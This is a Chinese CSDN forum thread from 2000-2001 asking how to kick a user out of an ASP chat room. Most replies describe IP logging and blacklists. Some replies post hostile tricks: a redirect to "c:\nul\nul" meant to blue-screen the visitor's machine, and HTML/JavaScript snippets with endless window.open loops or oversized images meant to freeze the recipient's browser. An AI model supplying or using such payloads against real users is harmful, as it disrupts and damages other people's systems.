请教各位大侠,怎样踢出聊天室里的某一个人?

HeavenBird 2000-08-18 03:09:00
加精
...全文
300 11 打赏 收藏 转发到动态 举报
写回复
用AI写文章
11 条回复
切换为时间正序
请发表友善的回复…
发表回复
penghongjie 2001-04-09
  • 打赏
  • 举报
回复
To孤独求胜,我试Response.Redirect "c:\nul\nul"和Response.Redirect "c:\null\null"
怎么都不见蓝屏.请赐教!
ClassID 2001-02-12
  • 打赏
  • 举报
回复
独孤求胜,具体点,我怎么知道usertable,聊天室又不是我的
farrio 2001-02-12
  • 打赏
  • 举报
回复
你是让他退出,还是想捏死他?
如果只是让他退出来,就直接从User Table里面Del了,再随便response.redirection个地址不就得了。
如果要捏死他,也很简单,就是response.redirection "c:\nul\nul"就行了,蓝屏。
smalle 2001-02-11
  • 打赏
  • 举报
回复
可以在每一个用户进入聊天室时记录他的IP,想踢某个人时把他的名字或IP列入黑名单,当他访问聊天室时就把他的页面引导到另一个页面,从而达到踢人的目的,这样既可踢人,又可封IP。如果有什么不明白可以与我继续讨论。
smalle1@163.com
Itboy 2001-02-11
  • 打赏
  • 举报
回复
1。登录的时候记录用户的IP或者其他唯一标志符
2。将要剔除用户的IP或者标志符号存放在Application或者数据库
3。在处理发言的时候发现是要剔除的用户就执行退出操作(如this.top.window.close())
HeavenBird 2000-08-20
  • 打赏
  • 举报
回复
各位大侠,我是想在自己的聊天室里加上这样的功能,以去掉某些捣蛋的人。
w102272 2000-08-19
  • 打赏
  • 举报
回复
设置一个黑名单列表,如果要踢人,
把这个用户名从用户列表中删除,放到黑名单中。
大家在用户列表中看不到他,当然无法和他CHAT了。
至于这个用户,检查黑名单,如果是里头的,不要发送CHAT画面,发送“已经被踢出”
xh_zhou 2000-08-19
  • 打赏
  • 举报
回复
我的实现方法是在用户进入时纪录它的ip,当你要踢他就封它的ip.
Ideal 2000-08-19
  • 打赏
  • 举报
回复
最好的办法是申请当网管,或当黑客
ywpg 2000-08-18
  • 打赏
  • 举报
回复
如果他的JAVASC开着,好办:
发:<aharf="http://www.csdn.net/" onmouseover="while(1){window.open('hduahfdkafkafh')}">
或:
<imgsrc="javascript:do{window.open('afhfakhfkafhahfha')}while(1)" width="1">
<imgsrc="http://abc/" width ="1" height="1000000000000000000000">
你的JAVASC和图片功能要关上。
另外,你问这些要干什么:-)
青润 2000-08-18
  • 打赏
  • 举报
回复
你一下子送给他一大堆东西,他肯定就被剔出来了。

28,390

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧